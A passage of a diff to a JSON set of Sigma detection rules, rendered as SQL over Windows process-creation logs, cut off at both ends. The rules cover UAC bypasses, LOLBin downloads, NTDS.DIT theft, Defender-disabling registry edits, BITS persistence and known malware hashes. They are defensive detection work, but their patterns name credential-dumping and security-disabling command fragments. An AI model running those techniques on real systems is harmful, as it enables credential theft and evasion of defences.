"e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml" + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", - "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', '332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Workstation Locking via Rundll32", - "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "title": "Sysinternals PsService Execution", + "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "status": "experimental", - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "author": "frack113", + "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + "Legitimate use of PsService by an administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psservice.exe' OR (NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_user32_dll.yml" + "filename": "proc_creation_win_sysinternals_psservice.yml" }, { - "title": "Suspicious CustomShellHost Execution", - "id": "84b14121-9d14-416e-800b-f3b829c5a14d", + "title": "Windows Binary Executed From WSL", + "id": "ed825c86-c009-4014-b413-b76003e33d35", "status": "experimental", - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_customshellhost.yml" + "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Monitoring For Persistence Via BITS", + "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unlikely" ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" - }, - { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", - "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown", - "Other security solution installers" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "status": "experimental", + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.persistence", + "attack.t1059" ], "falsepositives": [ - "AppvClient", - "CCM" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" - ], - "filename": "proc_creation_win_susp_parents.yml" - }, - { - "title": "New User Created Via Net.EXE", - "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "status": "test", - "description": "Identifies the creation of local users via the net.exe command.", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_net_user_add.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "Nslookup PowerShell Download Cradle - ProcessCreation", + "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 